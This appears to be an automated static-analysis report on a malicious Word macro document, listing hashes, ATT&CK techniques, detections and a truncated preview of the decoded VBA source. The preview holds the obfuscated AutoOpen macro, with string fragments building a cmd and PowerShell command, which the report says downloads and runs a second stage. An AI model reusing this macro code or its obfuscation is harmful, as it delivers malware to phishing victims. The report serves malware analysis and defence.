Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 546b6090c06247ae…

MALICIOUS

Office (OLE)

Size: 134.4 KB
Created: 2018-09-27 11:26:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 44317521a4e0a7bab411da9058d68e54
SHA-1: c8180a903b98cec19bc9ce413a38eb59314f0632
SHA-256: 546b6090c06247aedd6adab36a4cfc86b4c179b4bf91b586fd79a7c9ba9320ab
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro calls the Shell() function, a critical heuristic that indicates an attempt to execute arbitrary commands. A legacy WordBasic auto-exec marker and the ClamAV detection further support the malicious verdict. Because the macro code is obfuscated and the extracted source is truncated, the payload cannot be fully analyzed, but the intent is clearly to download and execute a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Malware.00536d-6699271-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.00536d-6699271-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 87082 bytes
SHA-256: f64e5610d74bf17569acd0122ed5526d73c18cf145fe0051904284344744593a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wstfmJw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim LkaHhw(2)
LkaHhw(0) = InStrRev(wvOdHGRR + sdzBGpZsCDFZbqSccHJzbL + GoqFFTVB, JdkhBGCr + nmMKwpYifXqSrCwwmEZ + moruF) + Left(kSuHUbjG + zTcVSqPJDFtGEKXKzS + knYwmwP, 426) + InStrRev(fHFGjUB + vzqqLctQIwSoihtqEQuhP + KIziDIz, jtwNTt + NtPrcSOwLwOBRafkSmFoV + HwkjW) + InStrRev(vUWvkiq + dwAYUOTiBIPMIqTKQNupl + zEjzk, FcrUcnt + CUCSiMCuOfTSPrORO + ROjGjOY)
LkaHhw(1) = InStrRev(RltsUjO + nhEWOPnjFkZbQlXlbfCdjiO + rnfdqj, avAQT + SdGpUIVwdwFlDzhOCvaHj + kwImUIsX) + Right(bYNQW + zubpzBHiFkjsuiXYHJ + MNtVMaUz, 617) + Right(HoUAnvBl + IoShDiszQZrGDjuaOIE + Oiaik, 561) + InStr(XlEZao + mFiHRQiFjOGLXuRSVEDIU + TUKCc, ibCWFjw + GAOzMAAzJWnrizPwNuVGWT + rhWiUUjz)
   Dim FLWsC(1)
FLWsC(0) = InStrRev(JjHAiklG + inkAXoCiPRjLJYiJPXPtEp + AUhPWt, iNEiXUJ + ZdVzbQCzCNPtjKBOzAun + qDqzlv) + InStrRev(XiMnXZEr + qcUohtDSvZUiXkMzD + zXWBw, cJFoUwsF + zihcTRzVmzoINidwRju + qlTjK) + Left(SiqBY + jFTBcowRNjHOPIklalhz + cihGBqkj, 55) + InStrRev(zfRFKCTG + isJzBnDtwHzLAhQXwYL + mJkfPj, VnzmYIzq + JziATRwUDjEiTarOHoKlQbY + qYRjzt)
   Dim tFOPFu(1)
tFOPFu(0) = InStr(jnRtVXrV + UuFWVcKvRilwfHRiIzvf + XRJsX, nGidXXkm + wVRvrmIiaqmjYOzKAWX + zpAHPkjs) + InStrRev(wKtPj + JHuBBFPcLmcbYiwBl + jtwjZc, wRizN + lwQurYtPzoVliuzpbA + AdLbOV)
toiMFARcmp (KeyString(pTdKE + zmtFII + 0 + 12 + 55 + nakur + FzTabBS) + qHlZdjk + AUvBlYOO + KeyString(JNMOfLO + drUhdIPA + 0 + 13 + 64 + XDpTGrKj + vMMjkw) + HNktI + ZoHKJwVSDkI + zblWNHa + vtjsdluD + UJjwQNf + HiPaDGvjb + isfjRWMQ + mqTjUOK + JiMjwI)
   Dim rzMSYv(2)
rzMSYv(0) = Right(EwmDFk + IYBvYvbIKPYaIDJC + QNuEJ, 307) + InStrRev(EMYNGX + hRXDlOjqOuzviNzsK + ODdDDzqK, zCWsiAW + OOvVvvFRAIfPAqDTGQpfKHW + CDNbmKr)
rzMSYv(1) = Left(hiIzjB + HjCjpLaoiZjkOZUdmhsFIPk + aJknUOzm, 476) + Left(smmncS + TInURPYPitQFZqwlOVO + jBszvFcp, 453)
End Sub


Attribute VB_Name = "imoSXwAkH"
Function HNktI()
rqijNCoYlh = "d   / /  \  \\  \ \" + "/ /V:O/C" + """" + "set ]" + "@'=702a 2a07 0" + "27a 02a7 2"
nnTqK = "70a 702a 0a27" + " 07a2 72a0" + " 7a20 a072 " + "72a0 a702 0a27 a207 " + "0a27 72a0 2" + "a70}2a70}a"
Dim lpiKD(1)
lpiKD(0) = Right(jlPsq + JOBrHQDwGnvdnvaKszS + jSisS, 487) + InStr(zTXhrFjC + nbXIVOvURjMvrIplKjcYo + QCcpu, KiBfawQ + FPTnYzszrQwGjMMzs + XZdkMjS)
   Dim lPwIKK(1)
lPwIKK(0) = InStrRev(cmopnNaY + oSALTiTLvUOzYciDzXLq + slCLUbi, jbhhV + LZjdOPMFUXVJXNkawRzJ + UmsBAMi) + InStr(LlKJMDWp + DNkmDTzuVtLQLCWLEHokV + REXWabtI, jApBjP + uzUwSRziCsOZLiPZX + SIvTKB) + Left(XsBWa + SmGVawPBvVbiTRTdjMDw + SUizNGoM, 782) + InStr(TCUUast + aDqFDlDzKPnwVIboohOpD + NwIGTK, ZPiYwb + jiApUjMscFiILNjYEoZq + jwszn)
   Dim VNfXIU(2)
VNfXIU(0) = Right(kFjrDqk + zwOkSEastKnZPwvkb + ODaMnFmU, 662) + Right(tlVTHCJ + QawwRrJcvAdjDKGQFn + RHZcE, 930)
VNfXIU(1) = Left(aGpinFcu + KQnsDMinzwsOJjrrPFf + ZWqYv, 93) + InStrRev(VJcGY + NuQnthsjlXYlCiDlSjWJr + kXEjmr, iVpsUEri + XjwIqTwDGXrkZjdnzzjR + KAmihb)
jfYkr = "720{0a72ha" + "027c0a72t7a02a027aca" + "072}702a;270ak20" + "7aa270ae0a2"
ckpGlnMfTc = "7r7a20b702a;a027H2" + "70aj2a07Oa027$20a7 " + "70a2m2a07e27" + "a0ta027I27a0-207aea" + "027k27a0o270av0a2"
sbLMHawZSQ = "7n270aI207" + "a;27a0)70a2Ha720" + "j2a70O7a02$" + "7a02 20a7,072ar7"
HNktI = rqijNCoYlh + nnTqK + jfYkr + ckpGlnMfTc + sbLMHawZSQ
   Dim jtDbwo(2)
jtDbwo(0) = InStrRev(afLhq + LLMFrkokjjkcsrObFBSoB + FHCRjv, TRpjChz + sMDAJtTTOQEsXUpdmTAo + YPGIM) + InStrRev(wzwpX + NSzPjXVaiFhsVSAswkddK + KItbVG, PUVkIZjw + DiBkdzEQXLjpnMNjSI + wFwfHPh) + InStrRev(IBHdSZi + EpaijibvMSRCTCifUwBjE + nfftnjm, IJQZT + TUAUFiCPuzaaCGErBwB + iGOvkmF) + Left(QiOEEV + wisjMVCmGUcvvQpwTG + pnDJUsS, 103)
jtDbwo(1) = InStrRev(YzXjzRl + wfkjbhQTOXmWwBDwhKUBl + kuORXN, zzEDcc + iqMwBAdCIZijzsEwVEW + fJwDw) + InStr(jdlqKZs + YlOPnciTFLXfiACTsB + JbpAznT, jNzTH + CickthEvRhKchFHEo + jjAfLoS)
   Dim TYTbh(1)
TYTbh(0) = Left(iEAPnlP
... (truncated)